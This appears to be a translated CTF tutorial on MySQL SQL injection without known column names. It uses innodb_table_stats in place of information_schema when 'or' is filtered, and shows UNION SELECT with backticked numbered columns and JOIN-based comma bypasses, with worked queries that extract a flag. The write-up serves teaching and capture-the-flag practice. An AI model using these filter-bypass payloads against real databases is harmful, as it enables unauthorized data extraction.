
SQL Injection: Injection Without Column Names

Introduction

When the SQL filter blocks the keyword or, column names cannot be looked up in the information_schema database (its name contains the substring or). However, when the MySQL version is above 5.6.3, the tables innodb_index_stats and innodb_table_stats exist; table names can be read from them, and the injection then proceeds without column names.

https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-3.html


Example

The challenge query is: select * from test where id=x

The current database has two tables:

flllllag

id flag
1 flag{3690c6f6-fe49-11e9-bf58-005056c00001}

test

id title content
1 hello tinmin

The flllllag table has two columns, so:

mysql> select 1,2 union select * from flllllag;
mysql> select * from (select 1,2 union select * from flllllag)a;

select 1,2 union select * from flllllag

1 2
2 flag{3690c6f6-fe49-11e9-bf58-005056c00001}

The test table has three columns.

A union select must keep the same number of columns:

  • select 1,`2`,3 from (select 1,2 union select * from flllllag)

`2` means the column named 2 in the FROM result, i.e. its second column.

1 2 3
1 2 3
1 flag{3690c6f6-fe49-11e9-bf58-005056c00001} 3

select * from test union select 1,`2`,3 from (select 1,2 union select * from flllllag)a;

The result is:

id title content
1 hello tinmin
1 2 3
1 flag{3690c6f6-fe49-11e9-bf58-005056c00001} 3

Filtering commas

Recall the statement used when commas are filtered:

select * from test union select 1,2,3

is equivalent to

select * from test union select * from (select 1)a join (select 2)b join (select 3)c

Back to our statement (the second column of the subquery must be referenced as `2`, otherwise the literal 2 is returned):

select * from test union select 1,`2`,3 from (select 1,2 union select * from flllllag)a;

  • select * from test union select * from (select 1)a join (select 2)b join(select `2` from (select 1,2 union select * from flllllag)i)k;

` is called a backtick.

SQL statements are usually written as:

select id from user

The canonical form is:

select `id` from user

Both query the id column.

Likewise, `2` queries the column whose header is 2.

Alternatively, the column can be selected by qualifying it with the table alias:

select * from (select 1,2)a
1 2
1 2

select a.1 from (select 1,2)a
1
1

select a.2 from (select 1,2)a
2
2

Make sure the joined subquery returns exactly one column:

  • select * from test union select * from (select 1)a join (select 2)b join(select i.2 from (select 1,2 union select * from flllllag)i)k;